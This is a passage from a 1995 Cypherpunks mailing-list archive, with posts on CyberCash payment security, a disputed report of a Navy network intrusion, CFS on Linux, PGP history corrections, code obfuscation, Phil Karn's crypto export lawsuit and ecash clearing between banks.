iQCVAwUBMNpaMfX0zg8FAL9FAQENjgQAoXP16Db9FdBuzRp1VXug3JWh7yCcHQCJ X/t79/q512WGYWBIKznkczgfYNE7V94J2dhEP6EfKeZzVN2J5AHV4zqq7e9IWR49 FQakcZCyIrSJIJCpRk/cyMOX5zc1posAkAAhEka7nOd9n/GgW9mHPr57yFwNQgB4 e2wcSW1r9Oo= =v8d3 -----END PGP SIGNATURE----- From dklur at dttus.com Fri Dec 22 12:32:35 1995 From: dklur at dttus.com (David Klur) Date: Sat, 23 Dec 1995 04:32:35 +0800 Subject: Cybercash questions... Message-ID: <9511228196.AA819668788@cc1.dttus.com> Hello, Just a few questions about Cybercash... - How is the consumer's credit card # stored on his hard drive? Encrypted with the bank's public key? Or does the consumer have a private key? - How does the merchant know where to ship the goods? Is the merchant required to ship the goods to the billing address on the cardholder's credit card account? If so, does the bank provide the merchant with this info? How is it encrypted? Or does the customer indicate to the merchant where to ship the goods? Also, what infor does the merhcant send to Cybercash, and how is it encrypted? The fraud possibility I see is that Bob could steal Alice's encrypted credit card number (by sniffing when she buys something at Charlie's Internet shop). Then, without decrypting it, he could use it (still encrypted) at Don's Internet shop, and ask Don to ship the goods to Bob's address. Since Don will not decrypt Alice's card number he will not know that it is not Bob's card. Cybercash will validate Alice's card, but will not know that it is really Bob who is the customer. Don will ship the goods to Bob, and Alice will get a fraudulent charge on her bill. Am I missing something? From dee at cybercash.com Fri Dec 22 13:05:42 1995 From: dee at cybercash.com (Donald E. Eastlake 3rd) Date: Sat, 23 Dec 1995 05:05:42 +0800 Subject: Cybercash questions... In-Reply-To: <9511228196.AA819668788@cc1.dttus.com> Message-ID: On Fri, 22 Dec 1995, David Klur wrote: > > Hello, > > Just a few questions about Cybercash... > > - How is the consumer's credit card # stored on his hard drive? > Encrypted with the bank's public key? Or does the consumer have a > private key? The customer has a private key. Customer info on their machine is encrypted under a password. > - How does the merchant know where to ship the goods? Is the merchant > required to ship the goods to the billing address on the cardholder's > credit card account? If so, does the bank provide the merchant with > this info? How is it encrypted? Or does the customer indicate to the > merchant where to ship the goods? Also, what infor does the merhcant > send to Cybercash, and how is it encrypted? Billing address establishment is part of shopping. It need not be the card billing address. But the customer needs to enter an addreess when setting up their credit card. see draft-eastlake-cybercash-v08-01.txt in any of the IETF shadow directories. > The fraud possibility I see is that Bob could steal Alice's encrypted > credit card number (by sniffing when she buys something at Charlie's > Internet shop). Then, without decrypting it, he could use it (still > encrypted) at Don's Internet shop, and ask Don to ship the goods to > Bob's address. Since Don will not decrypt Alice's card number he will > not know that it is not Bob's card. Cybercash will validate Alice's > card, but will not know that it is really Bob who is the customer. > Don will ship the goods to Bob, and Alice will get a fraudulent charge > on her bill. The customer signs the message including the merchant id and order id before encrypting a bunch of stuff including the credit card number to send to the merchant. There isn't anything useful to steal from the ecnrypted part of that message. > Am I missing something? Donald ===================================================================== Donald E. Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com 318 Acton Street +1 508-371-7148(fax) dee at world.std.com Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA) From anonymous-remailer at shell.portal.com Fri Dec 22 13:06:34 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 23 Dec 1995 05:06:34 +0800 Subject: taking electronic privacy into our own hands Message-ID: <199512222026.MAA21559@jobe.shell.portal.com> On Fri, 15 Dec 1995, Eric Anderson wrote: > Would it be possible to write a program ( i.e. a worm or > Trojan) to ferret out personal information that is stored in databases > and encrypt it? > > I was just wondering what such an undertaking would entail. Actually, there is no need to write any such code. AT&T distributes just such a beast to any and all comers. It can take personal information and send it out over a secure socket layer. I think a couple of partners in crime, Cheswick and Bellovin of AT&T research had a hand in its continuing distribution. > Eric Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From fc at all.net Fri Dec 22 13:17:09 1995 From: fc at all.net (Fred Cohen) Date: Sat, 23 Dec 1995 05:17:09 +0800 Subject: Navy hacked by Air Force? In-Reply-To: <55oht13r97.fsf@galil.austnsc.tandem.com> Message-ID: <9512222020.AA20069@all.net> > fc at all.net (Fred Cohen) said: > > FC> Credible? No. Accurate? Yes. We all make mistakes, and whenever I > FC> find one that I've made, I try to admit it and fix it ASAP. What's > FC> not credible is people who don't correct mistakes when they find > FC> them. > > Well, you corrected it, but you didn't admit it, at least not > here, and it makes people who made comments on the _original_ version > look like fools. Next time when you quote a corrected article, please > note that it's been corrected. The difference between an AF captain (4 > years of service) and a Navy captain (17-ish years of service) is > substantial when when judging whether they could be considered > 'whizzkids' in this environment. Not my mistake - iw at all.net's mistake - only my correction. And it wasn't a correction to an error in this forum - the error appeared in the Risks forum - the Cypherpunks posting (which I posted) was the corrected one. Am I supposed to correct mistakes in other forums made by other people when I post to Cypherpunks? (let me see... in 1928, a mistake was made on page 73 of the New York Times related to cryptography, ...) Even with only 4 years of service (after graduating from College), 25-27 years old is no longer whizzkid age in my book. But even more importantly, the readers who commented on this one error ignored the main body of facts in the posting in favor of creating a conspiracy theory. Next we find out from yet another story that at least part of the original story posted to Risks was in error. According to the second independent source, the Captain was working with the Navy's support and knowledge. How much do you want to bet that the story changes again by Tuesday? -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From mab at crypto.com Fri Dec 22 14:21:47 1995 From: mab at crypto.com (Matt Blaze) Date: Sat, 23 Dec 1995 06:21:47 +0800 Subject: CFS and Linux In-Reply-To: <199512222107.WAA00408@asylum.berserk.com> Message-ID: <199512222143.QAA14493@crypto.com> >two comments for matt thoo: > 1: please make it install 'out-of-the-box' on Linux. > I'd love to. It isn't that simple. No one has ever told me exactly what "the Linux problem" is or even convinced me that a problem actually exists. I don't run Linux. People who do run Linux are divided between telling me it that does run out-of-the-box and that it doesn't. ALL I can do is pass on patches that the people who run CFS under Linux give me. My understanding is that CFS does run out-of-the-box under some of the all-too-many varieties of Linux, but that it depends very much on your particular configuration (particularly your rpcgen version). Some configurations require some tweeking. If you want to see CFS supported out-of-the-box on a particular platform, someone has to tell me about it and supply me with the fixes, which I will galdly wrap into the distribution. Requests that I make something work on a platform that I don't have and don't control are very frustrating. Anyway, this is the wrong list for this. Linux issues come up every now and then on the cfs-users mailing list (cfs-users-request at research.att.com; subscription info included in the distribution). -matt From vin at shore.net Fri Dec 22 14:26:24 1995 From: vin at shore.net (Vin McLellan) Date: Sat, 23 Dec 1995 06:26:24 +0800 Subject: Navy hacked by Air Force? Message-ID: This might be relevant. This is a page from the NCCOSC web site The Naval Command, Control & Ocean Surveillance Center (NCCOSC) is the U.S. Navy's warfare center for command, control and communication systems and ocean surveillance and the integration of those systems which overarch multiplatforms. NCCOSC is based in San Diego, CA. NCCOSC Command Internet (NCI) is part of NCCOSC, of course -- and NCCOsc is part of SpaWar (Space and Naval Warfare Systems Command.) Clear? Note that NCCOSC recently decided to beef up NCI's user authentication. See "Current Initiatives." ================= [* ] NCI net - What it is * An enterprise network serving NCCOSC and other communities of interest * Modelled after the global Internet, logically part of the Internet * Communications nodes at each NCCOSC site, linked by T-1 lines * Nodes consist of... o Cisco router linking T-1 lines and local LANs o Annex terminal server and modem bank for dialup, SLIP, and PPP access o Sun servers providing general Internet services (email, name service, ftp server, world wide web, multicast routing, etc.) o NeXT server supporting corporate office functions * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout the organization and to the Internet * Provides dialup access from home or TDY via 1-800 number, including SLIP and PPP support [* ] [ ] Network Topology [* ] Recent activities and milestones * MIME adopted as corporate email standard, email systems upgraded o Many user agents upgraded to MIME compliance o Testing gateways for interoperability with non-compliant systems o Performing extensive interoperability tests * New sites connected o CINCLANTFLT, Norfolk, VA o The Pentagon + BRAC Office + OSS LAN + DASN/C3I o FTSCLANT (Portsmouth, VA) and NAVSEACENPAC (San Diego, CA) o Armed Forces Staff College, Norfolk, VA o USACOM site in Suffolk, VA + Joint Training, Analysis, and Simulation Center (JTASC) + NISE East Contingent at USACOM o NISE West Guam o NISE West Yokosuka Japan * Network accredited o Completed Security Test and Evaluation o Completed Risk Assessment o Published Contingency Plan and Configuration Management Plan * Network now under full configuration management * New Web server installed o "neelix", a Sun SparcServer 1000, installed outside firewall o "www.nosc.mil" now points at neelix o "Planet Earth" now served by neelix o Recent updates + 1 additional Sparc processor (completed 6/9/95) + 4 Gb more disk (completed 6/2/95) + another 64 Mbytes of memory (giving total of 96 Mbytes) (completed 6/2/95) + conversion to "Apache" http server (faster) (completed 6/1/95) [* ] Current Initiatives * Enhancing Infrastructure to provide ISDN dialup service * Implementing one-time-passwords using SecurID cards * Implementing Kerberos based authentication for additional security * Connecting additional sites o NISMC o USACOM at CINCLANT compound, Norfolk, VA o Pearl Harbor Naval Shipyard, Pearl Harbor, HI o Federal Internet Exchange (FIX) East, College Park, MD o New NISE East Detachment at Naval Weapons Station, Yorktown, VA o ONI at NMIC * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10 Mbps * Getting sites 100% connected (TCP/IP to every desktop) * Developing MIME to X.400 gateway for connectivity to DMS world [* ] References * Dialup Quick Guide * Monthly Reports * June 28 Internet Security Briefing (postscript) Vin McLellan +The Privacy Guild+ 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548 <*><*><*><*><*><*><*><*><*> From Greg_Rose at sydney.sterling.com Fri Dec 22 14:37:35 1995 From: Greg_Rose at sydney.sterling.com (Greg Rose) Date: Sat, 23 Dec 1995 06:37:35 +0800 Subject: PGP timeline FAQ... comments requested In-Reply-To: <297.9512221337@exe.dcs.exeter.ac.uk> Message-ID: I've embedded a couple of comments that might be useful. 1.4 Amusingly Adi Shamir (A from RSA) isn't even a US citizen, he's an Shamir is the 'S' from RSA, not the 'A'. 1.6 Because the publication was a rush job due to the NSA, R,S & A and the later formed PKP and RSADSI lose patent rights to RSA crypto outside the US. This is because most places outside the US, you have to obtain a patent *before* publication, where as in the US, you have one year from the publication date to file for patents. This also had implications for PGP later This is only half true. US Patent law was developed independently of most of the rest of the world's, and allowed patents like this. The Australian patent office would, at the time, have rejected the patent anyway on the grounds that you can't patent a mathematical formula. ====================================================================== 3 USG decides they don't like PRZ ====================================================================== You haven't defined USG as an acronym yet. To me it means Unix Support Group. It does come clear later though. regards, Greg. From anonymous-remailer at shell.portal.com Fri Dec 22 14:40:25 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 23 Dec 1995 06:40:25 +0800 Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE?? Message-ID: <199512222111.NAA24171@jobe.shell.portal.com> Just in case, anyone missed this yesterday, I thought I'd renominate AT&T & Netscape for the: *** 1995 CHRISTMAS NET SCROOGE *** *** AWARD *** (T-shirt sales coming soon, to a website near you ...) ------------ Alice here ... Back on Tue, 19 Dec 1995, I wrote: >>>Can anyone tell me whether Ian Goldberg and David Wagner got their >>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's >>>existing product line?? >>> >> >I can't remember whether they got anything or not ... >> >> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!). > > Not anything?? That's shameful ... where on earth are the values in > America, today? Everyone should ask this question. AT&T can sign-on to a two-page ad, calling on Congress to balance the budget -- to cut off veterans, and cut-off women with dependent children just before Christmas. It can sign on to this, but it can't bother to even offer a scholarship to the students who helped make its fortunes. It would rather leave the impression that it freeloads off of other's efforts. It's shameful. > AT&T and Netscape have jointly made a small fortune distributing this > product, and yet NEITHER company feels that the software engineers who > "voluntarily" made a difference -- a couple of students -- deserve > even a wooden nickel for the ideas which were used. > > It's absolutely shameful. But then, I guess that AT&T and Netscape > have no shame at all. > > They just steal "intellectual property" from students, and don't even > pay a token amount. > > And people wonder what's wrong with America? Luckily for those of us who don't live in the United States, we can perhaps look at that country and truly wonder what is going on over there, and what is wrong with America? Where are the values amongst ALL Americans, not just Netscape and AT&T? What are the role models that all the leaders -- business, sports, and political leaders -- show to the national youth. Here is all I've seen (as a foreigner), over the last while: Enid Greene Waldholtz blubbering in a news conference about how she as a congress person certainly COULDN'T be expected to resign after winning her election with stolen money. Blubbering for five hours straight (except when she had to stop to turn a page, I mean) ... She certainly said that "leadership" is all about playing "victim". Poor little Enid. (And even worse, she was _defended_ by Susan Molinari.) Bob Dole, deciding to go to Bosnia. The former WW II veteran willingly jeopardizing the lives of American boys -- boys who have put their lives on the line in a _volunteer_ armed force -- all for a lousy political photo-op. The chance to say ... "hey look at me, I'm here in Bosnia." Someone who's willing to overrule the Pentagon's own most diplomatic advice on how complex an operation this actually is. And then there is AT&T. A company who's Chairman can publish a letter which calls on Congress to cut off checks to mothers with dependent children and war veterans days before Christmas, all while stealing and freeloading off of the work of some students. Scrooge ... take heart. Here's Holiday wish #1. Enid do the right thing ... resign. Say the "right thing" and say that your child -- the future and the delayed gratification that the future brings -- is much more important than your own personal PRESENT political aspirations. Here's Holiday wish #2. Bob, lots of people worked their asses off to make sure that the American fighter pilot, and the two French fighter pilots could be rescued from Bosnia. If you want to go and get some photo-ops, go to Germany or Italy, and give one hell of a vote of support to the boys that are there -- a support which could just as easily have been given and should be given in Congress. A _real_ strong unfettered commitment. And here's Holiday wish #3. AT&T. Do the right thing. Reward those people who help make you a fortune. Stand tall as an example, rather than as an embarrassment to the nation. You've ignored this for so long now, that you've almost dug your own grave. But you still have a chance to save face. Have the courage to take the chance when it's offered. Simply say that the proposal to reward David Wagner and Ian Goldberg -- some holiday mad money and scholarships -- was lost in committee, and approval processes -- but it WAS in the works, and it was recommended and can now be announced just before Christmas, as a rightful reward. Some holiday cheer. Will people think it's a cynical attempt at manipulation? Yep. But it's a darned site better than the alternatives -- especially when you look at possible future outcomes. Trust me, this is far better than calling for veterans and single mothers with children to be cut-off just before the holidays. Perhaps, Enid, Bob, and AT&T will all learn when to use offense and when to use defense. They might also learn that the best offense is a good defense. They might even begin to look at what "courage" truly is, and of how difficult it can be for anyone to do the "right thing", especially when they think that they're surrounded by minefields. Even when the "right thing" is in your own best interest, you not only have to be shown the right path to take, but you have to have the motivation and courage to make the move and take action. Enid, Bob, and AT&T, take note. Hopefully for the holidays, everyone finds the courage to neutralize some portion of the vulnerability spectrum they've placed themselves in. > > - Ian "There's a reason people talk about `starving grad students'..." > > Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From stend at cris.com Fri Dec 22 14:41:09 1995 From: stend at cris.com (Sten Drescher) Date: Sat, 23 Dec 1995 06:41:09 +0800 Subject: Navy hacked by Air Force? In-Reply-To: <9512222020.AA20069@all.net> Message-ID: <55g2ec4xp8.fsf@galil.austnsc.tandem.com> fc at all.net (Fred Cohen) said: FC> Not my mistake - iw at all.net's mistake - only my correction. And it FC> wasn't a correction to an error in this forum - the error appeared FC> in the Risks forum - the Cypherpunks posting (which I posted) was FC> the corrected one. Am I supposed to correct mistakes in other FC> forums made by other people when I post to Cypherpunks? (let me FC> see... in 1928, a mistake was made on page 73 of the New York Times FC> related to cryptography, ...) 1) The correction makes a difference in the credibility of the statement, as you must have felt, since you made the change. Saying that a reporter called a 40-ish Navy captain a 'whizzkid' is foolish, while questioning the reasonableness of a reporter calling a 20-ish Air Force captain a 'whizzkid' is a difference of opinion (see below). Since you said it was the 'actual text', you should have posted the actual text, not your correction of it. If they sent out two messages, one correcting the other, I find it somewhat difficult to believe that they didn't at least preface it with a "sorry, we goofed" tag. FC> Even with only 4 years of service (after graduating from College), FC> 25-27 years old is no longer whizzkid age in my book. 2) As I said before, had I remained in ROTC, I would have been 24 when I was eligible to make captain. 3) At 26, I was still being referred to, by non computer-savvy people, in terms comprable to 'whizzkid'. FC> But even more FC> importantly, the readers who commented on this one error ignored the FC> main body of facts in the posting in favor of creating a conspiracy FC> theory. Next we find out from yet another story that at least part FC> of the original story posted to Risks was in error. According to FC> the second independent source, the Captain was working with the FC> Navy's support and knowledge. How much do you want to bet that the FC> story changes again by Tuesday? 4) The original story said that it was a "secret experiment" conducted in front of "Pentagon VIPs" "at the Electronic Systems Centre at Hanscom Air Force Base". Saying that the Navy was informed that this test would be made, or that Navy personnel were among the watching VIPs, is unremarkable, and does not call into question the original report. There were many security 'surveys' conducted against my systems by AFIWC (sorry, I don't remember the name of the specific group that does the surveys, but it's part of AFCERT) which I was unaware of which were authorized by the Air Force - in fact, I wouldn't be surprised if the "young Air Force captain" was from that group. 5) The second independent source backs up the report that the connection was made through the Internet, involving email connectivity, and with a personal computer and modem, all of which were specifically denied in the message from IW. Now that I've addressed ALL of the points in the 'denial' from IW, do you see why I characterized it as a military smokescreen? The only thing in it which remains unchallenged is that the original report is inaccurate in detail, and that there is a question as to whether someone in their mid-20s is a 'whizzkid'. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 Junk email is NOT appreciated. If I want to buy something, I'll find you. From fc at all.net Fri Dec 22 14:46:40 1995 From: fc at all.net (Fred Cohen) Date: Sat, 23 Dec 1995 06:46:40 +0800 Subject: Navy hacked by Air Force? In-Reply-To: <55g2ec4xp8.fsf@galil.austnsc.tandem.com> Message-ID: <9512222132.AA21783@all.net> ... Not to be picky, but... > 1) The correction makes a difference in the credibility of the > statement, as you must have felt, since you made the change. I agree that the change was important, but... > Saying > that a reporter called a 40-ish Navy captain a 'whizzkid' is foolish, > while questioning the reasonableness of a reporter calling a 20-ish Air > Force captain a 'whizzkid' is a difference of opinion (see below). We don't yet know how old he or she was - let's wait and see before we jump the gun. > Since you said it was the 'actual text', you should have posted the > actual text, not your correction of it. My text was the one published in the IW forum - Risks published first, the error was apparently found and corrected, and thus the IW forum had the corrected text. I will ask iw to inform Risks of the correction - however, I did post the actual text that I got from IW! This IT is so complex, isn't it? > If they sent out two messages, > one correcting the other, I find it somewhat difficult to believe that > they didn't at least preface it with a "sorry, we goofed" tag. They were to different forums, hence the "I goofed" tag would seem inappropriate in IW. Perhaps the next risks will include an 'I goofed' let's wait and see. > FC> Even with only 4 years of service (after graduating from College), > FC> 25-27 years old is no longer whizzkid age in my book. > > 2) As I said before, had I remained in ROTC, I would have been 24 when > I was eligible to make captain. > > 3) At 26, I was still being referred to, by non computer-savvy people, > in terms comprable to 'whizzkid'. I must be getting old. When I was growing up, all Wiz kids had to be 21 or less. I guess the media is running out of 18-year olds making a big splash. ... > 5) The second independent source backs up the report that the connection > was made through the Internet, involving email connectivity, and with a > personal computer and modem, all of which were specifically denied in > the message from IW. I must have read it differently. I thought that IW said something like not all email messages, and email messages did not reproduce, not that there were no email messages involved. I guess we both have to start reading more carefully. > Now that I've addressed ALL of the points in the 'denial' from > IW, do you see why I characterized it as a military smokescreen? The > only thing in it which remains unchallenged is that the original report > is inaccurate in detail, and that there is a question as to whether > someone in their mid-20s is a 'whizzkid'. I think that the whole issue is still pretty questionable - whether the experiment was authorized - whether it was a wiz kid - whether they actually took control - whether it came from the Internet or a Mil net - whether there was insider knowledge - etc. One thing I am becoming more certain of though - that there are no active battleships. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From usura at berserk.com Fri Dec 22 14:55:57 1995 From: usura at berserk.com (Alex de Joode) Date: Sat, 23 Dec 1995 06:55:57 +0800 Subject: CFS and Linux In-Reply-To: <199512210440.XAA28196@crypto.com> Message-ID: <199512222107.WAA00408@asylum.berserk.com> > > > > > Is there anyone out there that has CFS running with Linux ? > > > > It installs fine on BSDi 2.0 but I'm unable to install it > > under Linux, I would appreciate it if some one would help > > me out. > > > > -AJ- > > I don't run Linux, and every time I open my mouth it seems to provoke > a flame-fest, but I'll risk responding anyway. > > I'm told that all version of CFS since 1.0.4 (the latest is 1.3.1) > do work out-of-the-box under *some* releases of Linux and with some > coaxing on the others. > > I'm not sure exactly what problem you're having, but the most common > CFS-Linux problem that people complain about has to do with the rpcgen > output not being in the format expected by the rest of CFS. There > seem to be two things you can do about this: get a version of rpcgen > that generates the "standard" (original Sun) names for the functions it > generates, or just grab the rpcgen output from the cfs-users mailing list > archive ("echo help | mail cfs-users-request at research att.com" for details). > I would like to thank all people who gave me pointers; with the help of my sysadmin at Utopia we were able to compile and install it. two comments for matt thoo: 1: please make it install 'out-of-the-box' on Linux. 2: please rename the ssh shell programm, it did overwrite my ssh/slogin programm. All things said; thanks for really wonderfull programm. -AJ- ps: Merry Xmas and a Happy NewYear 2all ! From vin at shore.net Fri Dec 22 15:12:31 1995 From: vin at shore.net (Vin McLellan) Date: Sat, 23 Dec 1995 07:12:31 +0800 Subject: Navy hacked by Air Force? Message-ID: Drescher/Cohen/Drescher/Drescher/Cohen/Cohen.... I'm new to C'punks, so I don't yet have a grip on the context in which you consider privacy, property, and other ultimate values. I do wonder, though: Do you spend a lot of time pissin' on each other's shoes like this? From jimbell at pacifier.com Fri Dec 22 15:15:58 1995 From: jimbell at pacifier.com (jim bell) Date: Sat, 23 Dec 1995 07:15:58 +0800 Subject: Newsweek Nerd 50 Message-ID: At 11:04 PM 12/21/95 -0600, you wrote: >Cypherpunk Notables on the List: "Newsweek's Epithet" >Phil Zimmerman: "Crypto Creator" >Marc Rotenberg: "Privacy Advocate" >Sameer Parekh: "Protector of Privacy" >Johan Helsingius: "Crusader" >and Steven Levy, who sometimes posts here has the byline on the "Year of >the Net" feature. >PS to Newsweek -- Prof. Hoffman should be called a "Data Goddess" not a >"Geek" for exposing those bogus factors the marketdroids want to use to >control their survey data back up to the population level. Of course, Newsweek should have included the "baddies" as well: Dorothy Denning would be the Wicked Witch of the West, and Sternlight would have been one of those Winged Monkeys... From jimbell at pacifier.com Fri Dec 22 15:16:17 1995 From: jimbell at pacifier.com (jim bell) Date: Sat, 23 Dec 1995 07:16:17 +0800 Subject: ex encrypted script Message-ID: At 08:57 PM 12/21/95 -0800, you wrote: > >There is encrypt and then there is render useless to the reader. > >A tale I hear is that when HP had to deliver operating system source to >the french government they stripped all comments and changed all variable >and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O). >It still compiled but was 100% useless to human readers. >John Pettitt >email: jpettitt at well.sf.ca.us (home) > jpp at software.net (work) This is EXACTLY the kind of creative uncooperativeness that I was thinking of, on a different subject, when I proposed that Netscape do anything it could think of (legally) to sabotage, undermine, subvert, escape, and otherwise stifle any attempt by the US government to restrict crypto in general, or its export in particular. The fact is, we are all CREATIVE people, and presumably given any particular set of rules (laws) , it should be possible for us to "comply" with "the law" in such a way as to be as obstructively obnoxious as possible. From vin at shore.net Fri Dec 22 15:24:30 1995 From: vin at shore.net (Vin McLellan) Date: Sat, 23 Dec 1995 07:24:30 +0800 Subject: Navy hacked by Air Force? Message-ID: This might be relevant. This is a page from the NCCOSC web site The Naval Command, Control & Ocean Surveillance Center (NCCOSC) is the U.S. Navy's warfare center for command, control and communication systems and ocean surveillance and the integration of those systems which overarch multiplatforms. NCCOSC is based in San Diego, CA. NCCOSC Command Internet (NCI) is part of NCCOSC, of course -- and NCCOsc is part of SpaWar (Space and Naval Warfare Systems Command.) Clear? Note that NCCOSC recently decided to beef up NCI's user authentication. See "Current Initiatives." ================= [* ] NCI net - What it is * An enterprise network serving NCCOSC and other communities of interest * Modelled after the global Internet, logically part of the Internet * Communications nodes at each NCCOSC site, linked by T-1 lines * Nodes consist of... o Cisco router linking T-1 lines and local LANs o Annex terminal server and modem bank for dialup, SLIP, and PPP access o Sun servers providing general Internet services (email, name service, ftp server, world wide web, multicast routing, etc.) o NeXT server supporting corporate office functions * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout the organization and to the Internet * Provides dialup access from home or TDY via 1-800 number, including SLIP and PPP support [* ] [ ] Network Topology [* ] Recent activities and milestones * MIME adopted as corporate email standard, email systems upgraded o Many user agents upgraded to MIME compliance o Testing gateways for interoperability with non-compliant systems o Performing extensive interoperability tests * New sites connected o CINCLANTFLT, Norfolk, VA o The Pentagon + BRAC Office + OSS LAN + DASN/C3I o FTSCLANT (Portsmouth, VA) and NAVSEACENPAC (San Diego, CA) o Armed Forces Staff College, Norfolk, VA o USACOM site in Suffolk, VA + Joint Training, Analysis, and Simulation Center (JTASC) + NISE East Contingent at USACOM o NISE West Guam o NISE West Yokosuka Japan * Network accredited o Completed Security Test and Evaluation o Completed Risk Assessment o Published Contingency Plan and Configuration Management Plan * Network now under full configuration management * New Web server installed o "neelix", a Sun SparcServer 1000, installed outside firewall o "www.nosc.mil" now points at neelix o "Planet Earth" now served by neelix o Recent updates + 1 additional Sparc processor (completed 6/9/95) + 4 Gb more disk (completed 6/2/95) + another 64 Mbytes of memory (giving total of 96 Mbytes) (completed 6/2/95) + conversion to "Apache" http server (faster) (completed 6/1/95) [* ] Current Initiatives * Enhancing Infrastructure to provide ISDN dialup service * Implementing one-time-passwords using SecurID cards * Implementing Kerberos based authentication for additional security * Connecting additional sites o NISMC o USACOM at CINCLANT compound, Norfolk, VA o Pearl Harbor Naval Shipyard, Pearl Harbor, HI o Federal Internet Exchange (FIX) East, College Park, MD o New NISE East Detachment at Naval Weapons Station, Yorktown, VA o ONI at NMIC * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10 Mbps * Getting sites 100% connected (TCP/IP to every desktop) * Developing MIME to X.400 gateway for connectivity to DMS world [* ] References * Dialup Quick Guide * Monthly Reports * June 28 Internet Security Briefing (postscript) Vin McLellan +The Privacy Guild+ 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548 <*><*><*><*><*><*><*><*><*> From jimbell at pacifier.com Fri Dec 22 15:38:20 1995 From: jimbell at pacifier.com (jim bell) Date: Sat, 23 Dec 1995 07:38:20 +0800 Subject: ex encrypted script Message-ID: At 11:20 PM 12/21/95 -0800, you wrote: difficult for the amateur attacker. >> >>A tale I hear is that when HP had to deliver operating system source to >>the french government they stripped all comments and changed all variable >>and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O). >>It still compiled but was 100% useless to human readers. > >There is a commercial product out there from Gimpel Software called _The C >Shroud_. It removes all structure from the code, replacing it with gotos, >renames all the symbols to axxxxxxx, converts constants and strings to hex, >substitutes all #defines and expands all macros, strips all formatting and >comments, etc., resulting in a perfectly compilable, but infuriatingly >obfuscated set of source files. >Steven Weller On the other hand, there are some programmers out there whose work product makes such a product totally redundant! From robl at on-ramp.ior.com Fri Dec 22 15:51:05 1995 From: robl at on-ramp.ior.com (RobL) Date: Sat, 23 Dec 1995 07:51:05 +0800 Subject: Navy hacked by Air Force? Message-ID: At 04:58 PM 12/22/95 -0500, Vin McLellan wrote: > Drescher/Cohen/Drescher/Drescher/Cohen/Cohen.... > > I'm new to C'punks, so I don't yet have a grip on the context in >which you consider privacy, property, and other ultimate values. I do >wonder, though: Do you spend a lot of time pissin' on each other's shoes >like this? Laughing my ass off here.. not yet I have seen someone so precisely hit the nail on the head.. Seems this is happening a lot lately.. must be the tension of the holiday season.. Guess I need to start adding plastic shoe-guards to the C-punk kit.. ;) ------------------|----------------------------------------------------------- Rob Lowry | PO Box 288 | Rockford Wa 99030 | ral at otc.mhs.compuserve.com robl at on-ramp.ior.com From karn at qualcomm.com Fri Dec 22 16:00:21 1995 From: karn at qualcomm.com (Phil Karn) Date: Sat, 23 Dec 1995 08:00:21 +0800 Subject: More developments in Karn vs State Dept Message-ID: <30DB37B1.167EB0E7@qualcomm.com> I have been updating my web page almost daily with developments in my case. The latest is that we've written and asked the Court to accept a Supplementary Memorandum opposing the government's motion to toss out our suit, and I've backed it up with a Supplementary Declaration. In it I explain how I just found all of the source code at issue (the Applied Cryptography diskette) on a public FTP site in Italy. This took about 10 minutes using Netscape. I then downloaded the Triple DES code referenced in the earlier Declarations by NSA Deputy Director Crowell and myself in 1.7 seconds, adding that this is somewhat less time that it takes me to move to my computer, insert a floppy disk and return to the keyboard. The government is now asking the judge not to accept these latest filings. Stay tuned! The URL again is http://www.qualcomm.com/people/pkarn/export Phil From lvhove at vnet3.vub.ac.be Fri Dec 22 16:09:11 1995 From: lvhove at vnet3.vub.ac.be (Leo Van Hove) Date: Sat, 23 Dec 1995 08:09:11 +0800 Subject: [ecash] Re: Multi-issuer questions Message-ID: >On Tue, 19 Dec 1995, Marcel van der Peijl wrote in the ecash mailing list: > >> Q: If user A signs up with bank A, and merchant B signs up with bank B, >> can user A buy at merchant B? >> >> A: In theory: >> >> Bank A and bank B need to have an interbank clearing agreement. User >> A sends his money to merchant B. Merchant B contacts his own bank, >> bank B. Bank B recognizes the money as being issued at bank A, >> contacts bank A, and clears the coins there. Bank A credits bank B's >> account at bank A, bank B sends an acknowledge to merchant B and >> merchant B sends the goods to user A. > On Fri, 22 Dec 1995, Patiwat Panurach replied: > I dispute this even on theoretical grounds. > >Am I right in assuming that the only reason Bank B has in contacting Bank >A is to confirm that the ecash hasn't been double spent? Once that is >confirmed, there should be no need for contact between the two banks. >Bank A should not have to credit Bank B's account as there has been no >transfer from Bank A to Bank B. The transfer has been the deposit from --------------------- I guess you mean: from Bank B to Bank A >Bank B's customer to Bank B. Bank B is allready "credited", i.e., its >(e)cash researves have increased, the moment Bank A confirms that the >ecash is valid. > In my understanding - and I'm sure Marcel van der Peijl :-) will correct me :-( if I'm wrong - the only way Bank B can verify with Bank A that the ecash it has received from merchant B has not been spent before is by actually sending the _coins_ to Bank A. Hence there _is_ a transfer from Bank B to Bank A and thus Bank A has to credit Bank B's account... Marcel? Ciao, leo _________________________________________________________________________ Leo Van Hove Centre for Financial Economics Vrije Universiteit Brussel (Free University of Brussels) Pleinlaan 2 B-1050 Brussels Vox: +32 2 629.21.25 Fax: +32 2 629.22.82 e-mail: lvhove at vnet3.vub.ac.be VUB's Web site: http://www.vub.ac.be _________________________________________________________________________ From 